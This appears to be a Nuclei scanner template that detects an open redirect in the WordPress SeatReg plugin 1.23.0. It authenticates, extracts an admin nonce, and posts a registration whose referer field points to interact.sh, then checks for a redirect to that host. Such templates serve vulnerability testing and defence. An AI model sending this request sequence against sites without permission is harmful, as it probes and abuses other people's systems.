nuclei-templates/vulnerabilities/wordpress/seatreg-redirect.yaml

51 lines
1.4 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: seatreg-redirect
info:
name: WordPress Plugin SeatReg - Open Redirect
author: Mariam Tariq
severity: medium
description: |
WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.
reference:
- https://packetstormsecurity.com/files/167888/WordPress-SeatReg-1.23.0-Open-Redirect.html
metadata:
verified: "true"
tags: redirect,packetstorm,seatreg,wp-plugin,wp,wordpress,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=seatreg-welcome HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new-registration-name=test&action=seatreg_create_submit&seatreg-admin-nonce={{seatreg-admin-nonce}}&_wp_http_referer=http://interact.sh&submit=Create+new+registration
cookie-reuse: true
matchers:
- type: dsl
dsl:
- status_code_3 == 302
- contains(header_3, 'http://interact.sh')
condition: and
extractors:
- type: regex
name: seatreg-admin-nonce
part: body
group: 1
regex:
- '"seatreg\-admin\-nonce" value="([0-9a-z]+)"'
internal: true